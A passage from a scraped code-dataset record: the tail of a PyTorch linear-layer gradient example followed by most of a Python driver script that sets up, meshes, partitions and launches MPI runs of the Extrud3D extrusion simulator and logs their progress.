6]],\n dtype=torch.float32, requires_grad=True)\n\nlinear_torch.weight = torch.nn.Parameter(w)\n\n# Calculate 
ouput\ny = linear_torch.forward(x)\n\nprint(f\"x: {x}\")\nprint(f\"output y: {y}\\n\")\n\n# Loss from left outside\ngrad_y = torch.tensor([[1, 2], [2, 3]],\n dtype=torch.float32)\ny.backward(grad_y)\n\n\nprint(f\"grad y: {grad_y}\")\n# print(f\"grad y_t: {grad_y_t}\\n\")\n\n# Calculate gradient for x\ngrad_x = grad_y.matmul(w)\n\n# Calculate gradient for x\ngrad_w = linear_torch.weight.grad\n\nprint(f\"grad x: {grad_x}\")\nprint(f\"grad w: {grad_w}\")","repo_name":"WalterEren/efficient_machine_learning","sub_path":"4th_chapter/4_1_task/linear_layer.py","file_name":"linear_layer.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12199716428","text":"#!/usr/bin/env python\n# vim: set filetype=python\n\"\"\"\nThis module is the driver for the e3d simulator\n\n\"\"\"\n\nimport os\nimport sys\nimport re\nimport getopt\nimport shutil\nimport subprocess\nimport math\nimport partitioner\nimport fileinput\nimport datetime\nimport configparser\nfrom watchdog.observers import Observer\nfrom watchdog.observers.polling import PollingObserver \nfrom watchdog.events import FileSystemEventHandler\n\nif sys.version_info[0] < 3:\n from pathlib2 import Path\nelse:\n from pathlib import Path\n\ndebugNoSim = False\ndebugOutput = False\n\nclass E3dLog:\n def __init__(self):\n# print(\"The E3dLog constructor\")\n self.fileName = \"e3d.log\"\n self.fileHandle = \"\"\n self.currPos = 0\n self.statusLineLength = 0\n self.statusLinePos = 0\n self.fileContents = []\n\n def __def__(self):\n #print(\"The E3dLog deconstructor\")\n self.fileHandle.close()\n\n def openFileHandle(self):\n self.fileHandle = open(self.fileName, \"w\")\n\n def closeFileHandle(self):\n self.fileHandle.close()\n\n def appendLine(self, msg):\n with open(self.fileName, \"a\") as f:\n f.write(msg + \"\\n\")\n\n def writeNumAnglePositions(self, numAngPos):\n self.fileHandle.write(\"NumOfAnglePositions=%i\\n\" %numAngPos) \n self.fileHandle.write(\"Periodicity=%i\\n\" %paramDict['periodicity']) \n self.currPos = self.fileHandle.tell()\n self.fileHandle.flush()\n\n def writeGeneralInfo(self, parameterDict):\n\n projectFolder = parameterDict['projectFolder'] \n workingDir = Path('.')\n projectPath = Path(workingDir / projectFolder)\n projectFile = Path(projectPath / 'setup.e3d')\n\n self.fileHandle.write(\"[Extrud3DFileInfo]\\n\")\n self.fileHandle.write(\"FileType=Logging\\n\")\n self.fileHandle.write(\"FileVersion=Extrud3D 2022\\n\")\n today = datetime.date.today()\n self.fileHandle.write(\"Date=%s \\n\" % today.strftime(\"%d/%m/%Y\"))\n self.fileHandle.write(\"Extrud3DVersion=Extrud3D 2022.01\\n\")\n self.fileHandle.write(\"[SimulationStatus]\\n\")\n tempValue = \"\"\n if paramDict[\"temperature\"]:\n tempValue = \"true\"\n else:\n tempValue = \"false\" \n self.fileHandle.write(\"PathToE3DFile=%s\\n\" %str(projectFile))\n self.fileHandle.write(\"TemperatureCalculation=%s\\n\" %tempValue) \n self.fileHandle.write(\"NumOfCpus=%i\\n\" %parameterDict['numProcessors'])\n self.fileHandle.write(\"StartingTime=\" + str(datetime.datetime.now()) + \"\\n\")\n self.fileHandle.flush()\n\n self.currPos = self.fileHandle.tell()\n\n def updateStatusLine(self, msg):\n\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n self.fileContents = self.fileContents[:-1] \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(msg)\n\n def updateStatusLineInnerIteration(self, msg):\n\n with 
open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n self.fileContents = self.fileContents[:-3] \n\n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(msg)\n \n\n def updateStatusLineIteration(self, msg, itCurr):\n\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n if itCurr == 0:\n self.fileContents = self.fileContents[:-1] \n else:\n self.fileContents = self.fileContents[:-5] \n \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(msg)\n \n\n def updateStatusLineHeatIteration(self, msg, numLines=3):\n\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n self.fileContents = self.fileContents[:-3] \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(msg)\n\n def writeStatusHeat(self, msg):\n\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n self.fileContents = self.fileContents[:-1] \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(msg)\n\n def popLinesAndWrite(self, numLines, msg):\n\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n self.fileContents = self.fileContents[:-numLines] \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(msg)\n\n\n def popLinesBack(self, numLines):\n\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n self.fileContents = self.fileContents[:-numLines] \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(msg)\n\n def writeExitMsg(self):\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n\n self.fileContents = self.fileContents[:-1] \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(\"CurrentStatus=finished\\n\")\n f.write(\"FinishingTime=\" + str(datetime.datetime.now()) + \"\\n\")\n\n def writeStatusLine(self):\n self.openFileHandle()\n self.fileHandle.write(\"CurrentStatus=running\")\n self.closeFileHandle()\n\n def writeStatusLine2(self):\n self.fileHandle.write(\"CurrentStatus=running\")\n self.currPos = self.fileHandle.tell()\n\n def logErrorExit(self, message, errorCode):\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n self.fileContents = self.fileContents[:-1] \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(message + \"\\n\")\n f.write(\"ErrorCode=%i\\n\" % errorCode)\n f.write(\"FinishingTime=\" + str(datetime.datetime.now()) + \"\\n\")\n sys.exit(errorCode) \n\nmyLog = E3dLog()\n\nparamDict = {\n \"deltaAngle\": 10.0, # Angular step size\n \"singleAngle\": -10.0, # Single angle to compute \n \"hostFile\" : \"\", # Hostfile\n \"rankFile\" : \"\" , # Rankfile \n \"timeLevels\" : 36, # timeLevels\n \"periodicity\" : 1, # Periodicity \n \"numProcessors\" : 0, # Number of processors \n \"projectFolder\" : \"\", # The project folder\n \"skipSetup\" : False,\n \"shortTest\" : False, \n \"skipSimulation\" : False,\n \"hasDeltaAngle\": False,\n \"hasTimeLevels\": False,\n \"useSrun\": False,\n \"meshReduction\": False,\n \"dieSimulation\": False,\n \"temperature\" : False,\n \"partialFilling\" : False,\n \"onlyMeshCreation\" : False,\n \"retryDeformation\" : False\n}\n\nclass ProtocolObserver(FileSystemEventHandler):\n def on_created(self, 
event):\n fileBaseName = os.path.basename(event.src_path)\n\n def on_modified(self, event):\n fileBaseName = os.path.basename(event.src_path)\n patternFound = False\n if fileBaseName == \"prot.txt\":\n pattern = \"itns:\\s*([0-9]+)[/]\\s*([0-9]+)\"\n with open(event.src_path, \"r\") as f:\n fileContents = f.readlines()\n for line in reversed(fileContents):\n matchObj = re.search(pattern, line)\n if matchObj: \n patternFound = True\n statusMsg = \"CurrentInnerIteration=%i\\n\"\\\n \"MaxInnerIteration=%i\\n\"\\\n \"CurrentStatus=running Momentum Solver\" %(int(matchObj.group(1)), int(matchObj.group(2)))\n myLog.updateStatusLineInnerIteration(statusMsg)\n break\n#===============================================================================\n\n\n#===============================================================================\n# version function\n#===============================================================================\ndef version():\n \"\"\"\n Print out version information\n \"\"\"\n print(\"E3D + Reporter for SIGMA Version 2020.11.5, Copyright 2019 IANUS Simulation\")\n#===============================================================================\n\n\n#===============================================================================\n# usage function\n#===============================================================================\ndef usage():\n \"\"\"\n Print out usage information\n \"\"\"\n print(\"Usage: python e3d_start.py [options]\")\n print(\"Where options can be:\")\n print(\"['-f', '--project-folder']: Path to project folder containing a setup.e3d file\")\n print(\"['-n', '--num-processors']: Number of processors to use\")\n print(\"['-p', '--periodicity']: Periodicity of the solution (1, 2, 3, ... \" +\n \"usually the time flight number)\")\n print(\"['-a', '--angle']: If this parameter is present a single simulation with \" +\n \"that specific angle will be done.\")\n print(\"['-d', '--delta-angle']: The angular step size between two simulations \" +\n \"in the sim loop (default 10)\")\n print(\"['-c', '--host-conf']: A hostfile as input for the mpirun command\")\n print(\"['-r', '--rank-file']: A rankfile as input for the mpirun command\")\n print(\"['-t', '--time']: Number of time levels to complete a full 360 rotation\")\n print(\"['-o', '--do-temperature']: The simulation loop will do a temperature simulation\")\n print(\"['-h', '--help']: prints this message\")\n print(\"['-v', '--version']: prints out version information\")\n print(\"['-x', '--short-test']: configures the program for a short test\")\n print(\"['-u', '--use-srun']: Uses the srun launch mechanism\")\n print(\"['--die-simulation']: fires up a single angle DIE sim with the corresponding datafile\")\n print(\"['--mesh-reduction']: Deforms and reduces the mesh file\")\n print(\"Example: python ./e3d_start.py -f myFolder -n 5 -t 36\")\n#===============================================================================\n\n\n#===============================================================================\n# custom mkdir\n#===============================================================================\ndef mkdir(dir):\n if os.path.exists(dir):\n if os.path.isdir(dir):\n return\n else:\n os.remove(dir)\n os.mkdir(dir)\n#===============================================================================\n\n\n#===============================================================================\n# simple file in-situ replacement method\n#===============================================================================\ndef 
replace_in_file(file_path, search_text, new_text):\n with fileinput.input(file_path, inplace=True) as f:\n for line in f:\n new_line = line.replace(search_text, new_text)\n print(new_line, end='')\n#===============================================================================\n\n\n#===============================================================================\n# Parse MaxNumStep from q2p1_param.dat\n#===============================================================================\ndef parseMaxNumSteps(file_path):\n maxIters = 300\n pattern = re.compile(r\"SimPar@MaxNumStep\\s+[=]\\s+([0-9]+)\")\n for line in open(file_path):\n for match in re.finditer(pattern, line):\n maxIters = int(match.group(1))\n return maxIters\n\n return maxIters\n#===============================================================================\n\n\n#===============================================================================\n# e3dToDict \n#===============================================================================\ndef e3dToDict(pathName):\n config = configparser.ConfigParser()\n config.read(pathName)\n\n if not pathName.exists():\n raise FileNotFoundError(\"File {0} was not found.\".format(pathName))\n\n return config\n#===============================================================================\n\n\n#===============================================================================\n# setup the case folder \n#===============================================================================\ndef folderSetup(workingDir, projectFile, projectPath, projectFolder):\n if not projectFile.is_file():\n projectFile = Path(projectPath / 'Extrud3D.dat')\n if not projectFile.is_file():\n print(\"Could not find a valid parameter file in the project folder: \" +\n str(projectPath))\n sys.exit(2)\n\n if paramDict['shortTest']:\n if (paramDict['dieSimulation']) :\n backupDataFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_DIE_test.dat\")\n elif (paramDict['partialFilling']) :\n backupDataFile = Path(\"_data_PF\") / Path(\"q2p1_paramV_0_test.dat\")\n elif (paramDict['meshReduction']) :\n backupDataFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_MESH.dat\")\n else:\n backupDataFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_BU_test.dat\")\n else:\n if (paramDict['dieSimulation']) :\n backupDataFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_DIE.dat\")\n elif (paramDict['partialFilling']) :\n backupDataFile = Path(\"_data_PF\") / Path(\"q2p1_paramV_0.dat\")\n elif (paramDict['meshReduction']) :\n backupDataFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_MESH.dat\")\n else:\n backupDataFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_BU.dat\")\n \n# backupDataFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_BU.dat\")\n destDataFile = Path(\"_data\") / Path(\"q2p1_param.dat\")\n\n shutil.copyfile(str(backupDataFile), str(destDataFile))\n shutil.copyfile(str(projectFile), str(workingDir / Path(\"_data/Extrud3D_0.dat\")))\n\n offList = []\n if not sys.platform == \"win32\":\n offList = list(Path(projectFolder).glob('*.off')) + list(Path(projectFolder).glob('*.OFF'))\n else: \n offList = list(Path(projectFolder).glob('*.off'))\n\n for item in offList:\n shutil.copyfile(str(item), str(workingDir / item.name))\n\n if Path(\"_data/meshDir\").exists():\n print(\"meshDir exists\")\n shutil.rmtree(\"_data/meshDir\")\n#===============================================================================\n\n#===============================================================================\n# Mesher Step 
\n#===============================================================================\ndef mesherStep(workingDir, projectFile, projectPath, projectFolder):\n\n myLog.updateStatusLine(\"CurrentStatus=running Mesher\")\n\n if sys.platform == \"win32\":\n exitCode = subprocess.call([\"./s3d_mesher\"]) \n else:\n exitCode = subprocess.call([\"./s3d_mesher\"], shell=True)\n\n\n if exitCode != 0:\n myLog.logErrorExit(\"CurrentStatus=abnormal Termination Mesher\", exitCode)\n\n if not Path(\"_data/meshDir\").exists():\n meshDirPath = projectPath / Path(\"meshDir\")\n if meshDirPath.exists():\n print('Copying meshDir from Project Folder!')\n shutil.copytree(str(meshDirPath), \"_data/meshDir\")\n else:\n print(\"Error: No mesh automatically generated and no \" + \n \"folder present in the case folder \" + str(projectPath))\n sys.exit(2)\n \n return exitCode\n#===============================================================================\n\n\n#===============================================================================\n# Partitioner Step \n#===============================================================================\ndef partitionerStep(workingDir, projectFile, projectPath, projectFolder):\n partitionerParameters = [1, 1]\n if paramDict['partialFilling']:\n partitionerParameters = [-3, 2]\n\n print(\"Partitioner parameters: \",-1, partitionerParameters)\n try:\n myLog.updateStatusLine(\"CurrentStatus=running Partitioner\")\n partitioner.partition(paramDict['numProcessors']-1, partitionerParameters[0], partitionerParameters[1], \"NEWFAC\", \"_data/meshDir/file.prj\")\n except Exception:\n myLog.logErrorExit(\"CurrentStatus=abnormal Termination Partitioner\", 2)\n \n#===============================================================================\n\n\n#===============================================================================\n# Simulation Setup \n#===============================================================================\ndef simulationSetup(workingDir, projectFile, projectPath, projectFolder):\n\n folderSetup(workingDir, projectFile, projectPath, projectFolder)\n\n exitCode = mesherStep(workingDir, projectFile, projectPath, projectFolder)\n \n partitionerStep(workingDir, projectFile, projectPath, projectFolder)\n \n return exitCode\n#===============================================================================\n\n\n#===============================================================================\n# Only Mesh Creation\n#===============================================================================\ndef onlyMeshCreation(workingDir, projectFile, projectPath, projectFolder):\n\n folderSetup(workingDir, projectFile, projectPath, projectFolder)\n\n exitCode = mesherStep(workingDir, projectFile, projectPath, projectFolder)\n \n return exitCode\n#===============================================================================\n\n \n#===============================================================================\n# Compute maximum number of simulation iterations\n#===============================================================================\ndef calcMaxSimIterations():\n nmax = 0\n\n if paramDict['hasDeltaAngle']:\n paramDict['timeLevels'] = 360.0 / paramDict['deltaAngle'] \n\n if paramDict['timeLevels'] == 1:\n nmax = 1\n else:\n paramDict['deltaAngle'] = 360.0 / float(paramDict['timeLevels'])\n nmax = int(math.ceil(360.0 / paramDict['periodicity'] / paramDict['deltaAngle']))\n\n if paramDict['singleAngle'] >= 0.0:\n nmax = 1\n \n #print(\"nmax: \",nmax)\n\n return 
nmax\n#===============================================================================\n\n\n#===============================================================================\n# Set up the MPI launch command\n#===============================================================================\ndef setupMPICommand():\n mpiPath = Path(\"mpirun\")\n if sys.platform == \"win32\":\n mpiPath = Path(os.environ['MSMPI_BIN']) / Path(\"mpiexec.exe\")\n\n paramDict['mpiCmd'] = mpiPath\n#===============================================================================\n\n#===============================================================================\n# The simulation loop for mesh reduction\n#===============================================================================\ndef simLoopMeshReduction(workingDir):\n\n mpiPath = paramDict['mpiCmd']\n numProcessors = paramDict['numProcessors']\n angle = 0\n\n shutil.copyfile(\"_data/Extrud3D_0.dat\", \"_data/Extrud3D.dat\")\n\n with open(\"_data/Extrud3D.dat\", \"a\") as f:\n f.write(\"Angle=\" + str(angle) + \"\\n\")\n \n if sys.platform == \"win32\":\n exitCode = subprocess.call([r\"%s\" % str(mpiPath), \"-n\", \"%i\" % numProcessors, \"./q2p1_sse_mesh.exe\"])\n else:\n launchCommand = \"\"\n\n if paramDict['useSrun']:\n launchCommand = \"srun \" + os.getcwd() + \"/q2p1_sse_mesh\"\n if paramDict['singleAngle'] >= 0.0:\n launchCommand = launchCommand + \" -a %d\" %(angle)\n else:\n launchCommand = \"mpirun -np \" + str(numProcessors) + \" \" + os.getcwd() + \"/q2p1_sse_mesh\"\n if paramDict['singleAngle'] >= 0.0 :\n launchCommand = launchCommand + \" -a %d\" %(angle)\n \n myLog.updateStatusLine(\"CurrentStatus=running Mesh reduction module\")\n \n exitCode = subprocess.call([launchCommand], shell=True)\n\n if exitCode != 0:\n myLog.logErrorExit(\"CurrentStatus=abnormal Termination Momentum Solver\", exitCode)\n else:\n myLog.updateStatusLine(\"CurrentStatus=finished Mesh reduction module\")\n \n#===============================================================================\n# The simulation loop for velocity calculation\n#===============================================================================\ndef simLoopVelocity(workingDir):\n nmax = calcMaxSimIterations()\n\n mpiPath = paramDict['mpiCmd']\n numProcessors = paramDict['numProcessors']\n\n nmin = 0\n start = 0.0\n maxInnerIters = parseMaxNumSteps(\"_data/q2p1_param.dat\")\n with open(\"_data/Extrud3D_0.dat\", \"a\") as f:\n f.write(\"\\n[E3DSimulationSettings]\\n\")\n f.write(\"dAlpha=\" + str(paramDict['deltaAngle']) + \"\\n\")\n f.write(\"Periodicity=\" + str(paramDict['periodicity']) + \"\\n\")\n f.write(\"nSolutions=\" + str(paramDict['timeLevels']) + \"\\n\")\n\n for i in range(nmin, nmax): # nmax means the loop goes to nmax-1\n if paramDict['singleAngle'] >= 0.0:\n angle = paramDict['singleAngle']\n else:\n angle = start + i * paramDict['deltaAngle']\n\n shutil.copyfile(\"_data/Extrud3D_0.dat\", \"_data/Extrud3D.dat\")\n\n with open(\"_data/Extrud3D.dat\", \"a\") as f:\n f.write(\"Angle=\" + str(angle) + \"\\n\")\n\n statusMsg = \"CurrentAngleIteration=%i\\n\"\\\n \"MaxAngleIteration=%i\\n\"\\\n \"CurrentInnerIteration=%i\\n\"\\\n \"MaxInnerIteration=%i\\n\"\\\n \"CurrentStatus=running Momentum Solver\" %(i+1, nmax, 1, maxInnerIters)\n myLog.updateStatusLineIteration(statusMsg, i)\n\n workingDir = os.getcwd()\n protocolFilePath = os.path.join(workingDir, \"_data\")\n\n eventHandler = ProtocolObserver()\n observer = \"\" \n if sys.platform == \"win32\":\n observer = 
PollingObserver()\n else:\n observer = Observer()\n\n observer.schedule(eventHandler, path=protocolFilePath, recursive=False)\n observer.start()\n\n if sys.platform == \"win32\":\n exitCode = subprocess.call([r\"%s\" % str(mpiPath), \"-n\", \"%i\" % numProcessors, \"./q2p1_sse.exe\"])\n else:\n launchCommand = \"\"\n\n if paramDict['useSrun']:\n launchCommand = \"srun \" + os.getcwd() + \"/q2p1_sse\"\n if paramDict['singleAngle'] >= 0.0:\n launchCommand = launchCommand + \" -a %d\" %(angle)\n else:\n launchCommand = \"mpirun -np \" + str(numProcessors) + \" \" + os.getcwd() + \"/q2p1_sse\"\n if paramDict['singleAngle'] >= 0.0 :\n launchCommand = launchCommand + \" -a %d\" %(angle)\n\n exitCode = subprocess.call([launchCommand], shell=True)\n\n if paramDict['retryDeformation'] and exitCode == 55:\n with open(\"_data/q2p1_param.dat\", \"r\") as f:\n for l in f:\n if \"SimPar@UmbrellaStepM\" in l:\n orig_umbrella = int(l.split()[2])\n UmbrellaStepM = orig_umbrella\n while exitCode == 55 and UmbrellaStepM != 0:\n replace_in_file(\"_data/q2p1_param.dat\", \"SimPar@UmbrellaStepM = \"+str(UmbrellaStepM), \"SimPar@UmbrellaStepM = \"+str(int(UmbrellaStepM/2)))\n UmbrellaStepM = int(UmbrellaStepM / 2)\n print(\"Retrying deformation with UmbrellaStepsM = %d\" % UmbrellaStepM)\n exitCode = subprocess.call([launchCommand], shell=True)\n replace_in_file(\"_data/q2p1_param.dat\", \"SimPar@UmbrellaStepM = \"+str(UmbrellaStepM), \"SimPar@UmbrellaStepM = \"+str(orig_umbrella))\n if UmbrellaStepM == 0:\n print(\"UmbrellaStepsM reduced to 0 during retry\")\n\n # Here the observer can be turned off\n observer.stop()\n\n if exitCode == 88:\n myLog.logErrorExit(\"CurrentStatus=the screw could not be created: wrong angle\", exitCode)\n\n if exitCode != 0:\n myLog.logErrorExit(\"CurrentStatus=abnormal Termination Momentum Solver\", exitCode)\n\n # Write final inner iteration state\n statusMsg = \"CurrentInnerIteration=%i\\n\"\\\n \"MaxInnerIteration=%i\\n\"\\\n \"CurrentStatus=running Momentum Solver\" %(maxInnerIters, maxInnerIters)\n myLog.updateStatusLineInnerIteration(statusMsg)\n\n iangle = int(angle)\n if os.path.exists(Path(\"_data/prot.txt\")):\n shutil.copyfile(\"_data/prot.txt\", \"_data/prot_%04d.txt\" % iangle)\n\n return exitCode \n#===============================================================================\n\n\n#===============================================================================\n# Clean the working directory\n#===============================================================================\ndef cleanWorkingDir(workingDir):\n if not sys.platform == \"win32\":\n offList = list(workingDir.glob('*.off')) + list(workingDir.glob('*.OFF'))\n else: \n offList = list(workingDir.glob('*.off'))\n\n # temporarily blocked ==> should be released later\n #for item in offList:\n #os.remove(str(item))\n#===============================================================================\n\n\n#===============================================================================\n# The simulation loop for combined velocity and temperature calculation\n#===============================================================================\ndef simLoopTemperatureCombined(workingDir):\n\n numProcessors = paramDict['numProcessors']\n mpiPath = paramDict['mpiCmd']\n maxIterations = 2\n for iter in range(maxIterations):\n \n if paramDict['shortTest']:\n backupVeloFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_%01d_test.dat\" % iter)\n else:\n backupVeloFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_%01d.dat\" % iter)\n \n if 
paramDict['shortTest']:\n backupTemperatureFile = Path(\"_data_BU\") / Path(\"q2p1_paramT_test.dat\")\n else:\n backupTemperatureFile = Path(\"_data_BU\") / Path(\"q2p1_paramT_%01d.dat\" % iter)\n \n veloDestFile = Path(\"_data\") / Path(\"q2p1_param.dat\")\n temperatureDestFile = Path(\"_data\") / Path(\"q2p1_paramT.dat\")\n print(\"Copying: \", backupVeloFile, veloDestFile)\n print(\"Copying: \", backupTemperatureFile, temperatureDestFile)\n shutil.copyfile(str(backupVeloFile), str(veloDestFile))\n shutil.copyfile(str(backupTemperatureFile), str(temperatureDestFile))\n\n if iter > 0:\n myLog.updateStatusLineHeatIteration(\"CurrentHeatIteration=%i\\nMaxHeatIteration=%i\\nCurrentStatus=running Heat Solver\" %(iter+1, maxIterations))\n\n else:\n myLog.writeStatusHeat(\"CurrentHeatIteration=%i\\nMaxHeatIteration=%i\\nCurrentStatus=running Heat Solver\" %(iter+1, maxIterations))\n \n exitCode = simLoopVelocity(workingDir)\n\n# statusMsg = \"CurrentIteration=%i\\nMaxIteration=%i\\nCurrentStatus=running Momentum Solver\" %(i+1, nmax)\n\n if sys.platform == \"win32\":\n exitCode = subprocess.call([r\"%s\" % str(mpiPath), \"-n\", \"%i\" % numProcessors, \"./q2p1_sse_temp.exe\"])\n else:\n\n launchCommand = \"\"\n\n if paramDict['useSrun']:\n launchCommand = \"srun \" + os.getcwd() + \"/q2p1_sse_temp\"\n if paramDict['singleAngle'] >= 0.0:\n launchCommand = launchCommand + \" -a %d\" %(paramDict['singleAngle'])\n else:\n launchCommand = \"mpirun -np \" + str(numProcessors) + \" \" + os.getcwd() + \"/q2p1_sse_temp\"\n if paramDict['singleAngle'] >= 0.0 :\n launchCommand = launchCommand + \" -a %d\" %(paramDict['singleAngle'])\n\n exitCode = subprocess.call([launchCommand], shell=True)\n\n if exitCode != 0:\n myLog.logErrorExit(\"CurrentStatus=abnormal Termination Heat Solver\", exitCode)\n\n myLog.popLinesAndWrite(5, \"CurrentStatus=running Heat Solver\")\n \n dirName = Path(\"_prot%01d\" % iter)\n mkdir(dirName)\n protList = list(Path(\"_data\").glob('prot*'))\n \n for item in protList:\n shutil.copy(str(item), dirName)\n os.remove(item)\n\n if paramDict['shortTest']:\n backupVeloFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_%01d_test.dat\" % maxIterations)\n else:\n backupVeloFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_%01d.dat\" % maxIterations)\n \n veloDestFile = Path(\"_data\") / Path(\"q2p1_param.dat\")\n print(\"Copying: \", backupVeloFile, veloDestFile)\n shutil.copyfile(str(backupVeloFile), str(veloDestFile))\n\n #myLog.popLinesAndWrite(3, \"CurrentStatus=running Heat Solver\")\n exitCode = simLoopVelocity(workingDir)\n#===============================================================================\n\n\n#===============================================================================\n# The cfd simulation loop for partial filling\n#===============================================================================\ndef simLoopMainPartialFilling(workingDir, it, loops):\n\n nmax = calcMaxSimIterations()\n\n mpiPath = paramDict['mpiCmd']\n numProcessors = paramDict['numProcessors']\n\n nmin = 0\n start = 0.0\n maxInnerIters = parseMaxNumSteps(\"_data/q2p1_param.dat\")\n if debugNoSim:\n print(\"Line 676, Updating maxInnerIters: \", maxInnerIters)\n with open(\"_data/Extrud3D_0.dat\", \"a\") as f:\n f.write(\"\\n[E3DSimulationSettings]\\n\")\n f.write(\"dAlpha=\" + str(paramDict['deltaAngle']) + \"\\n\")\n f.write(\"Periodicity=\" + str(paramDict['periodicity']) + \"\\n\")\n f.write(\"nSolutions=\" + str(paramDict['timeLevels']) + \"\\n\")\n\n\n for i in range(nmin, nmax): # nmax means the loop goes to nmax-1\n\n if 
paramDict['singleAngle'] >= 0.0:\n angle = paramDict['singleAngle']\n else:\n angle = start + i * paramDict['deltaAngle']\n\n shutil.copyfile(\"_data/Extrud3D_0.dat\", \"_data/Extrud3D.dat\")\n\n with open(\"_data/Extrud3D.dat\", \"a\") as f:\n f.write(\"Angle=\" + str(angle) + \"\\n\")\n\n statusMsg = \"CurrentAngleIteration=%i\\n\"\\\n \"MaxAngleIteration=%i\\n\"\\\n \"CurrentInnerIteration=%i\\n\"\\\n \"MaxInnerIteration=%i\\n\"\\\n \"CurrentStatus=running Momentum Solver\" %(it+1, loops+1, 1, maxInnerIters)\n\n myLog.updateStatusLineIteration(statusMsg, it)\n\n workingDir = os.getcwd()\n protocolFilePath = os.path.join(workingDir, \"_data\")\n\n eventHandler = ProtocolObserver()\n observer = \"\" \n if sys.platform == \"win32\":\n observer = PollingObserver()\n else:\n observer = Observer()\n\n observer.schedule(eventHandler, path=protocolFilePath, recursive=False)\n observer.start()\n\n if not debugNoSim:\n if sys.platform == \"win32\":\n exitCode = subprocess.call([r\"%s\" % str(mpiPath), \"-n\", \"%i\" % numProcessors, \"./q2p1_sse_partfil.exe\"])\n else:\n launchCommand = \"\"\n\n if paramDict['useSrun']:\n launchCommand = \"srun \" + os.getcwd() + \"/q2p1_sse_partfil\"\n if paramDict['singleAngle'] >= 0.0:\n launchCommand = launchCommand + \" -a %d\" %(angle)\n else:\n launchCommand = \"mpirun -np \" + str(numProcessors) + \" \" + os.getcwd() + \"/q2p1_sse_partfil\"\n if paramDict['singleAngle'] >= 0.0 :\n launchCommand = launchCommand + \" -a %d\" %(angle)\n\n exitCode = subprocess.call([launchCommand], shell=True)\n\n if paramDict['retryDeformation'] and exitCode == 55:\n with open(\"_data/q2p1_param.dat\", \"r\") as f:\n for l in f:\n if \"SimPar@UmbrellaStepM\" in l:\n orig_umbrella = int(l.split()[2])\n UmbrellaStepM = orig_umbrella\n while exitCode == 55 and UmbrellaStepM != 0:\n replace_in_file(\"_data/q2p1_param.dat\", \"SimPar@UmbrellaStepM = \"+str(UmbrellaStepM), \"SimPar@UmbrellaStepM = \"+str(int(UmbrellaStepM/2)))\n UmbrellaStepM = int(UmbrellaStepM / 2)\n exitCode = subprocess.call([launchCommand], shell=True)\n replace_in_file(\"_data/q2p1_param.dat\", \"SimPar@UmbrellaStepM = \"+str(UmbrellaStepM), \"SimPar@UmbrellaStepM = \"+str(orig_umbrella))\n else:\n input(\"Line 743, DebugMode, SimLoopMainPartialFilling: q2p1_sse_partfil\")\n exitCode = 0 \n # Here the observer can be turned off\n observer.stop()\n \n if exitCode == 88:\n myLog.logErrorExit(\"CurrentStatus=the screw could not be created: wrong angle\", exitCode)\n\n if exitCode != 0:\n myLog.logErrorExit(\"CurrentStatus=abnormal Termination Momentum Solver\", exitCode)\n\n # Write final inner iteration state\n statusMsg = \"CurrentInnerIteration=%i\\n\"\\\n \"MaxInnerIteration=%i\\n\"\\\n \"CurrentStatus=running Multiphase Momentum Solver\" %(maxInnerIters, maxInnerIters)\n myLog.updateStatusLineInnerIteration(statusMsg)\n\n iangle = int(angle)\n if os.path.exists(Path(\"_data/prot.txt\")):\n shutil.copyfile(\"_data/prot.txt\", \"_data/prot_%04d.txt\" % iangle)\n\n return exitCode \n#===============================================================================\n\n\n#===============================================================================\n# The simulation loop for partial filling\n#===============================================================================\ndef simLoopPartialFilling(workingDir):\n\n mpiPath = paramDict['mpiCmd']\n numProcessors = paramDict['numProcessors']\n\n if paramDict['shortTest']:\n nLoops = 2 \n else:\n nLoops = 4 \n\n # Start the initial loop\n it = 0\n if debugNoSim:\n 
